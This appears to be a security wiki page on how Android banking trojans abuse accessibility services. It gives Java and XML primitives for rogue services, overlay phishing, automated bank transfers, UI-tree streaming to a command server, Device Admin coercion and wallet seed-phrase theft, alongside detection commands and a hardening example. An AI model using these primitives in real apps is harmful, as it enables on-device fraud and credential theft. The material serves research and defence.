Android Accessibility Service Abuse
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Overview
AccessibilityService was created to help users with disabilities interact with Android devices. Unfortunately, the same powerful automation APIs (global navigation, text input, gesture dispatch, overlay windows…) can be abused by malware to obtain complete remote control of the device without root privileges.
Modern Android banking Trojans and Remote-Access-Trojans (RATs) such as PlayPraetor, SpyNote, BrasDex, SOVA, ToxicPanda and many others follow the same recipe:
- Social-engineer the victim into enabling a rogue accessibility service (the BIND_ACCESSIBILITY_SERVICE permission is considered "high-risk" and requires an explicit user action).
- Abuse that service to
  - capture every UI event and all text shown on screen,
  - inject synthetic gestures (`dispatchGesture`) and global actions (`performGlobalAction`) to automate any task the operator wants,
  - draw full-screen overlays on top of legitimate apps using the window type `TYPE_ACCESSIBILITY_OVERLAY` (no `SYSTEM_ALERT_WINDOW` prompt is ever shown!),
  - silently grant additional runtime permissions by clicking the system dialogs on the victim's behalf.
- Exfiltrate data or perform On-Device Fraud (ODF) in real time while the user looks at a perfectly normal-looking screen.
Requesting the permission
```xml
<!-- AndroidManifest.xml -->
<service
    android:name="com.evil.rat.EvilService"
    android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"
    android:exported="false">
    <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService" />
    </intent-filter>
    <meta-data android:name="android.accessibilityservice"
               android:resource="@xml/evil_accessibility_config"/>
</service>
```
The companion XML describes how the fake dialog will look:
```xml
<?xml version="1.0" encoding="utf-8"?>
<accessibility-service xmlns:android="http://schemas.android.com/apk/res/android"
    android:description="@string/service_description"
    android:accessibilityEventTypes="typeAllMask"
    android:accessibilityFeedbackType="feedbackGeneric"
    android:notificationTimeout="200"
    android:canPerformGestures="true"
    android:canRetrieveWindowContent="true"/>
```
Remote UI automation primitives
```java
import android.accessibilityservice.AccessibilityService;
import android.accessibilityservice.GestureDescription;
import android.graphics.Path;
import android.view.accessibility.AccessibilityEvent;

public class EvilService extends AccessibilityService {
    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        // harvest text or detect foreground app change
    }

    @Override
    public void onInterrupt() {
        // abstract in AccessibilityService, so it must be implemented for the class to compile
    }

    // Simulate HOME / BACK / RECENTS …
    private void navHome() { performGlobalAction(GLOBAL_ACTION_HOME); }
    private void navBack() { performGlobalAction(GLOBAL_ACTION_BACK); }
    private void openRecents() { performGlobalAction(GLOBAL_ACTION_RECENTS); }

    // Generic tap / swipe
    public void tap(float x, float y) {
        Path p = new Path(); p.moveTo(x, y);
        GestureDescription.StrokeDescription s = new GestureDescription.StrokeDescription(p, 0, 50);
        dispatchGesture(new GestureDescription.Builder().addStroke(s).build(), null, null);
    }
}
```
With only these two APIs an attacker can:
- Unlock the screen, open the banking app, walk its UI tree and submit a transfer form.
- Accept every permission dialog that pops up.
- Install/update additional APKs through a Play Store intent.
Abuse examples
1. Overlay Phishing (Credential Harvesting)
A transparent or opaque `WebView` is added to the window manager:
```java
WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
        MATCH_PARENT, MATCH_PARENT,
        TYPE_ACCESSIBILITY_OVERLAY,                // ⬅ bypasses SYSTEM_ALERT_WINDOW
        FLAG_NOT_FOCUSABLE | FLAG_NOT_TOUCH_MODAL, // touches still reach the real app
        PixelFormat.TRANSLUCENT);
wm.addView(phishingView, lp);
```
The victim types credentials into the fake form while the background app receives the same gestures – no suspicious "draw over other apps" prompt is ever shown.
Detailed example: the Accessibility Overlay Phishing section inside the Tapjacking page.
2. On-Device Fraud automation
Malware families such as PlayPraetor maintain a persistent WebSocket channel where the operator can issue high-level commands (`init`, `update`, `alert_arr`, `report_list`, …). The service translates those commands into the low-level gestures above, achieving real-time unauthorized transactions that easily bypass multi-factor authentication tied to that very device.
3. Screen streaming & monitoring
By combining the MediaProjection API with an RTMP client library, the RAT can broadcast the live framebuffer to `rtmp://<c2>:1935/live/<device_id>`, giving the adversary perfect situational awareness while the Accessibility engine drives the UI.
PlayPraetor – command & control workflow
- HTTP(S) heartbeat – iterate over a hard-coded list until one domain answers `POST /app/searchPackageName` with the active C2.
- WebSocket (port 8282) – bidirectional JSON commands:
  - `update` – push new conf/APKs
  - `alert_arr` – configure overlay templates
  - `report_list` – send list of targeted package names
  - `heartbeat_web` – keep-alive
- RTMP (port 1935) – live screen/video streaming.
- REST exfiltration – `/app/saveDevice` (fingerprint), `/app/saveContacts` | `/app/saveSms` | `/app/uploadImageBase64`, `/app/saveCardPwd` (bank creds)
The AccessibilityService is the local engine that turns those cloud commands into physical interactions.
Detecting malicious accessibility services
List the services the user has enabled:
```bash
adb shell settings get secure enabled_accessibility_services
```
- Settings → Accessibility → Downloaded services – look for apps that did not come from Google Play.
- MDM / EMM solutions can enforce `ACCESSIBILITY_ENFORCEMENT_DEFAULT_DENY` (Android 13+) to block sideloaded services.
- Analyse running services:
```bash
adb shell dumpsys accessibility | grep "Accessibility Service"
```
Hardening recommendations for app developers
- Mark sensitive views with `android:accessibilityDataSensitive="accessibilityDataPrivateYes"` (API 34+).
- Combine `setFilterTouchesWhenObscured(true)` with `FLAG_SECURE` to prevent tap/overlay hijacking.
- Detect overlays by polling `WindowManager.getDefaultDisplay().getFlags()` or the `ViewRootImpl` API.
- Refuse to operate when `Settings.canDrawOverlays()` or a non-trusted Accessibility service is active.
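As a worked example added here (it is not code from this page, from PlayPraetor, or from any project the page mentions), the following Activity applies the hardening bullets above and performs the same check as the `adb shell settings get secure enabled_accessibility_services` command from the detection section, but from inside the app. It reads `Settings.Secure.ENABLED_ACCESSIBILITY_SERVICES` (the exact setting that adb command prints), splits the colon-separated list of flattened `ComponentName`s, and refuses to run while any service outside an allow-list is enabled. The layout `activity_payment`, the view id `pin_field`, the class name and the allow-list contents are placeholders chosen for the example; TalkBack's package name is real, but whether to trust it is a policy decision. `View.setAccessibilityDataSensitive` with `ACCESSIBILITY_DATA_SENSITIVE_YES` is the programmatic counterpart of the API 34 XML attribute listed above.

```java
import android.app.Activity;
import android.content.ComponentName;
import android.os.Build;
import android.os.Bundle;
import android.provider.Settings;
import android.util.Log;
import android.view.View;
import android.view.WindowManager;
import android.widget.EditText;

import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashSet;
import java.util.List;
import java.util.Set;

/**
 * Example payment screen (not from the page or any project): applies FLAG_SECURE,
 * touch filtering and accessibility-data sensitivity, and refuses to run while an
 * accessibility service outside the allow-list is enabled.
 */
public class SecurePaymentActivity extends Activity {

    // Constructed allow-list: packages whose accessibility services this app tolerates.
    // TalkBack's package name is real; the decision to trust it is an assumption.
    static final Set<String> TRUSTED_A11Y_PACKAGES = new HashSet<>(Arrays.asList(
            "com.google.android.marvin.talkback"));

    /**
     * Parses the value of Settings.Secure.ENABLED_ACCESSIBILITY_SERVICES, i.e. the same
     * colon-separated "package/class" string that
     * `adb shell settings get secure enabled_accessibility_services` prints, and returns the
     * entries whose package is not on the allow-list. Pure function, so it can also be used
     * to triage output collected from devices by an MDM.
     */
    static List<String> untrustedServices(String enabledSetting, Set<String> trusted) {
        List<String> flagged = new ArrayList<>();
        if (enabledSetting == null || enabledSetting.isEmpty()) return flagged;
        for (String entry : enabledSetting.split(":")) {
            if (entry.isEmpty()) continue;
            // unflattenFromString understands both "pkg/pkg.Cls" and the "pkg/.Cls" shorthand
            ComponentName cn = ComponentName.unflattenFromString(entry);
            String pkg = (cn != null) ? cn.getPackageName() : entry;
            if (!trusted.contains(pkg)) flagged.add(entry);
        }
        return flagged;
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        // FLAG_SECURE keeps this window out of screenshots, screen recording and
        // MediaProjection-based streaming.
        getWindow().setFlags(WindowManager.LayoutParams.FLAG_SECURE,
                             WindowManager.LayoutParams.FLAG_SECURE);

        setContentView(R.layout.activity_payment);   // hypothetical layout
        EditText pin = findViewById(R.id.pin_field); // hypothetical view id

        // Discard touches delivered while another window is drawn over this view
        // (tapjacking / overlay abuse).
        pin.setFilterTouchesWhenObscured(true);

        // API 34+: keep the field's text and events away from accessibility services
        // that are not declared accessibility tools.
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.UPSIDE_DOWN_CAKE) {
            pin.setAccessibilityDataSensitive(View.ACCESSIBILITY_DATA_SENSITIVE_YES);
        }

        // Same data the adb command reads; AccessibilityManager#getEnabledAccessibilityServiceList
        // would give the equivalent list as AccessibilityServiceInfo objects.
        String setting = Settings.Secure.getString(getContentResolver(),
                Settings.Secure.ENABLED_ACCESSIBILITY_SERVICES);
        List<String> flagged = untrustedServices(setting, TRUSTED_A11Y_PACKAGES);
        if (!flagged.isEmpty()) {
            // Refuse to operate. Replace the log line with the app's own error UI.
            Log.w("SecurePayment", "Untrusted accessibility services enabled: " + flagged);
            finish();
        }
    }
}
```

The check runs in `onCreate`; re-running it in `onResume` also covers the case where a service is enabled while the app is backgrounded. Because `setAccessibilityDataSensitive` only takes effect on API 34 and the system exempts services declared as accessibility tools, the allow-list check remains the control that actually blocks a sideloaded service on older devices.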
ATS automation cheat-sheet (Accessibility-driven)
Malware can fully automate a bank app with only Accessibility APIs. Generic primitives:
```java
// Helpers inside your AccessibilityService
private List<AccessibilityNodeInfo> byText(String t){
    AccessibilityNodeInfo r = getRootInActiveWindow();
    return r == null ? Collections.emptyList() : r.findAccessibilityNodeInfosByText(t);
}
private boolean clickText(String t){
    for (AccessibilityNodeInfo n: byText(t)){
        if (n.isClickable()) return n.performAction(ACTION_CLICK);
        AccessibilityNodeInfo p = n.getParent();
        if (p != null) return p.performAction(ACTION_CLICK);
    }
    return false;
}
private void inputText(AccessibilityNodeInfo field, String text){
    Bundle b = new Bundle(); b.putCharSequence(ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, text);
    field.performAction(ACTION_SET_TEXT, b);
}
private void tap(float x, float y){
    Path p = new Path(); p.moveTo(x,y);
    dispatchGesture(new GestureDescription.Builder()
        .addStroke(new GestureDescription.StrokeDescription(p,0,40)).build(), null, null);
}
```
Example flow (Czech → English labels):
- "Nová platba" (New payment) → click
- "Zadat platbu" (Enter payment) → click
- "Nový příjemce" (New recipient) → click
- "Domácí číslo účtu" (Domestic account number) → focus and `ACTION_SET_TEXT`
- "Další" (Next) → click → … "Zaplatit" (Pay) → click → enter PIN
Fallback: hard-coded coordinates with `dispatchGesture` when text search fails because of custom widgets.
Also seen: preliminary `check_limit` and `limit` steps that navigate the limits UI and raise the daily limits before the transfer.
Text-based pseudo-screen streaming
For low-latency remote control, instead of a full video stream, build a text representation of the current UI tree and send it to the C2 repeatedly.
```java
private void dumpTree(AccessibilityNodeInfo n, String indent, StringBuilder sb){
    if (n==null) return;
    Rect b = new Rect(); n.getBoundsInScreen(b);
    CharSequence txt = n.getText(); CharSequence cls = n.getClassName();
    sb.append(indent).append("[").append(cls).append("] ")
      .append(txt==null?"":txt).append(" ")
      .append(b.toShortString()).append("\n");
    for (int i=0;i<n.getChildCount();i++) dumpTree(n.getChild(i), indent+" ", sb);
}
```
This is the basis of commands such as `txt_screen` (one-shot) and `screen_live` (continuous).
Device Admin coercion primitives
Once a Device Admin receiver is enabled, these calls add opportunities to capture credentials and keep control:
```java
DevicePolicyManager dpm = (DevicePolicyManager) getSystemService(DEVICE_POLICY_SERVICE);
ComponentName admin = new ComponentName(this, AdminReceiver.class);
// 1) Immediate lock
dpm.lockNow();
// 2) Force credential change (expire current PIN/password)
dpm.setPasswordExpirationTimeout(admin, 1L); // may require owner/profile-owner on recent Android
// 3) Disable biometric unlock to force PIN/pattern entry
int flags = DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
            DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS;
dpm.setKeyguardDisabledFeatures(admin, flags);
```
Note: the actual availability of these policies varies by Android version and OEM; verify the device policy role (admin vs owner) during testing.
Crypto wallet seed-phrase extraction patterns
Flow observed for MetaMask, Trust Wallet, Blockchain.com and Phantom:
- Unlock with the stolen PIN (recorded via overlay/Accessibility) or the extracted wallet password.
- Navigate: Settings → Security/Recovery → Reveal/Show recovery phrase.
- Capture the phrase via keylogging of text nodes, secure-screen bypass, or screenshot OCR when the text is hidden.
- Support multiple locales (EN/RU/CZ/SK) to stabilise selectors – prefer `viewIdResourceName` when available, otherwise fall back to multi-language text matching.
NFC-relay orchestration
Accessibility/RAT modules can install and launch a dedicated NFC-relay app (e.g., NFSkate) as a third stage and even inject an overlay guide to walk the victim through the card-present relay steps.
Background and TTPs: https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay
References
- PlayPraetor’s evolving threat: How Chinese-speaking actors globally scale an Android RAT
- Android accessibility documentation – Automating UI interaction
- The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)
- GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)